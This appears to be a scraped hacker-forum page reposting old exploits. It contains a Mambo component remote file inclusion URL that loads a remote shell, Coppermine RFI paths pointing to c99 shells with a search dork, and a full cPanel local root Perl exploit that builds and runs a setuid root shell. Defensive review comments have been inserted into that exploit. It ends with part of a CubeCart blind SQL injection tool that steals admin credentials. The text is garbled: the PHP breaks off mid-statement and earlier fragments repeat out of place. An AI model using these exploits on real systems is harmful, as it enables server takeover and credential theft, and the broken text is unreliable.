om_videodb Mambo Componenet <= 0.3en Remote Include Vulnerability Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew Another Mambo component remote inclusion vulneribility download : http://mamboxchange.com/frs/download odb_v0.3en.zip bug found in file : core/videodb.class.xml.php global $mosConfig_absolute_path; require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' ); exploit: http://[site]/[mambo]/components/com_videodb/core/videodb.class.xml.php?mosC onfig_absolute_path=[shell] Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker [at] dalnet crew, #mardongan, #motha, #papmahackerlink baby_hacker(HCE) coppermine (nuke module) RFI vul search google: Code: allinurl:modules.php?name=coppermine xploit: Code: <server>/modules/coppermine/themes/default/theme.php?THEME_DIR=c99 <server>/modules/coppermine/include/init.inc.php?CPG_M_DIR=c99 Black_hat_cr(HCE) cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit - Cái này hay à Trích:
#!/usr/bin/perl -w
# 10/01/06 - cPanel <= 10.8.x cpwrap root exploit via mysqladmin
# use strict; # haha oh wait
#
# Review notes (defensive reading of this 2006 milw0rm proof of concept):
# Vulnerability class: environment inheritance into a privileged helper.
# The script points PERL5LIB at the current directory, drops a file named
# strict.pm there, and then runs the cPanel mysqlwrap helper.  The implied
# root cause is that the privileged helper (or something it spawns) loads
# `strict` from the caller-controlled PERL5LIB rather than a fixed @INC --
# TODO confirm against the affected cPanel build; only the caller side is
# visible here.
# Mitigation pattern for any privileged wrapper: scrub PERL5LIB, PERLLIB,
# PERL5OPT (and PATH, IFS, LD_*) before executing anything; run perl with
# taint checks (-T), under which PERL5LIB/PERLLIB are ignored; hard-code
# @INC.  Detection: a strict.pm outside the perl library tree, or a
# setuid-root file named Maildir, sitting in a user-writable directory.
my $cpwrap = "/usr/local/cpanel/bin/cpwrap";
my $mysqlwrap = "/usr/local/cpanel/bin/mysqlwrap";
# Shells out for the working directory; Cwd::getcwd() would avoid the subprocess.
my $pwd = `pwd`;
chomp $pwd;
# The lever: PERL5LIB directories are prepended to @INC of every child perl
# that does not scrub its environment or run with taint checks.
$ENV{'PERL5LIB'} = "$pwd";
# Preconditions: a C compiler and both cPanel helpers must exist and be executable.
if ( ! -x "/usr/bin/gcc" ) { die "gcc: $!\n"; }
if ( ! -x "$cpwrap" ) { die "$cpwrap: $!\n"; }
if ( ! -x "$mysqlwrap" ) { die "$mysqlwrap: $!\n"; }
# Crude patch check: scans the wrapper for the literal string REMOTE_USER and
# treats its absence as "vulnerable".  Heuristic only -- a defender should
# verify the installed fix level rather than rely on this string.
# (2-arg open with a bareword handle; the path is a fixed constant here.)
open (CPWRAP, "<$cpwrap") or die "Could not open $cpwrap: $!\n";
while(<CPWRAP>) { if(/REMOTE_USER/) { die "$cpwrap is patched.\n"; } }
close (CPWRAP);
# The dropped strict.pm, once loaded by a root-privileged perl, writes a tiny
# C program that calls setreuid(0,0)/setregid(0,0) and execs a shell,
# compiles it, installs it setuid (mode 4755) as ./Maildir, and removes its
# own traces.  The heavy backslash escaping is three layers of quoting: this
# script's string -> strict.pm's string -> the shell command line.
open (STRICT, ">strict.pm") or die "Can't open strict.pm: $!\n";
print STRICT "\$e = \"int main(){setreuid(0,0);setregid(0,0);system(\\\\\\\" /bin/bash\\\\\\\");}\";\n";
print STRICT "system(\"/bin/echo -n \\\"\$e\\\">Maildir.c\");\n";
print STRICT "system(\"/usr/bin/gcc Maildir.c -o Maildir\");\n";
print STRICT "system(\"/bin/chmod 4755 Maildir\");\n";
print STRICT "system(\"/bin/rm -f Maildir.c strict.pm\");\n";
close (STRICT);
# Trigger: run the privileged helper with the attacker's PERL5LIB in effect;
# its stderr is discarded.  Presumably the DUMPMYSQL action makes it invoke
# perl/mysqladmin -- not shown here, verify against the helper itself.
system("$mysqlwrap DUMPMYSQL 2>/dev/null");
# Success is judged solely by whether ./Maildir now exists; on failure the
# dropped module is cleaned up.
if ( -e "Maildir" ) { system("./Maildir"); } else { unlink "strict.pm"; die "Failed\n"; }
# milw0rm.com [2006-10-01]
navaro(HCE) CubeCart <= 3.0.11 disclosure exploit Tên bug: CubeCart <= 3.0.11 "oid" blind SQL injection / admin credentials Code: #!/usr/bin/php -q -d short_open_tag=on <? print_r(' CubeCart <= 3.0.11 "oid" blind SQL injection / admin credentials disclosure exploit by rgod rgod@autistici.org site: http://retrogod.altervista.org dork: "Copyright Devellion Limited 2005. All rights reserved." -> this works against MySQL >=4.1 (allowing subs) '); /* short explaination: software site: http://www.cubecart.com/site/home/ same kind of sql injection of http://retrogod.altervista.org/cubecart_3011_sql.html but this bypass magic_quotes_gpc=On because of base64_decode() function used in /modules/gateway/Protx/confirmed.php used near lines: if($success == TRUE){ $cart_order_id = base64_decode($_GET['oid']); include_once(" / / /includes/orderSuccess.inc.php"); $result = "?pg=".base64_encode("Protx"); } else { */ if ($argc<3) { print_r(' Usage: php '.$argv[0].' 
host path OPTIONS host: target server (ip/hostname) path: path to CubeCart Options: -T[prefix]: specify a table prefix different from default (CubeCart_) -p[port]: specify a port other than 80 -P[ip:port]: specify a proxy -a adjust the first argument to pass to benchamrk() function -s: use sleep() (this function was added in MySQL 5.0.12.) instead of benchmark() -d disclose table prefix (reccomended) Example: php '.$argv[0].' localhost /cubecart/ php '.$argv[0].' localhost /cubecart/ -a200000 -Tcube_ '); die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy ';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy \r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { . ';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy "; $ock=fsockopen($parts[0],$parts[1]); if (!$ock). JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker [at] dalnet crew, #mardongan, #motha, #papmahackerlink baby _hacker( HCE) coppermine (nuke module) RFI vul search google:. 
Componenet <= 0.3en Remote Include Vulnerability Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew Another Mambo component remote inclusion vulneribility download : http://mamboxchange.com/frs/download